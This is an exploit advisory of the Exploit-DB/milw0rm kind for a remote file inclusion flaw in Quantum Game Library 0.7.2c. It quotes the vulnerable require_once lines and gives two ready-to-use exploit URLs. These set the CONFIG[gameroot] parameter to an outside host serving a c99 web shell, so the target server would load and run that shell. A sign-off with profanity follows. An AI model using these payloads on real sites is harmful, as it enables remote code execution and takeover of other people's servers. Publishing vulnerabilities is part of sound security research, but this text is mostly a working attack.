Quantum Game Library 0.7.2c - Remote File Inclusion

EDB-ID:

5174




Platform:

PHP

Date:

2008-02-22


# Name : Quantum Game Library 0.7.2c Multiple Remote File Include
# Download From : http://garr.dl.sourceforge.net/sourceforge/quantumstar/qsgen_0.7.2c.zip
# Found By : RoMaNcYxHaCkEr     [RoMaNTiC-TeaM]          
# Home Page :  WwW.4RxH.CoM  
+============================================================================+
# Vulne Code In Files server_request.php & smarty.inc.php In Line 2 & 1 :
require_once($CONFIG['gameroot']."/qlib/config/config.inc.php");
require_once($CONFIG['gameroot']."/qlib/smarty/libs/Smarty.class.php");
# Exploit :
http://www.4rxh.com/qsgen_0.7.2c/server_request.php?CONFIG[gameroot]=http://rxh.freehostia.com/shells/c99in.txt?
http://www.4rxh.com/qsgen_0.7.2c/qlib/smarty.inc.php?CONFIG[gameroot]=http://rxh.freehostia.com/shells/c99in.txt?
That,s It,s
Good Luck Everybody
+============================================================================+
# Greet To :
Tryag TeaM & All Members Of My Forum
# For Contact : RxH@HotMail.iT
# Note : Yesterday I Help You !! Tomorrow Fuck Me !!! Fuck All Snitches !!! But Do You Know What !!! That,s Is My Mistake
Best Wishes

# milw0rm.com [2008-02-22]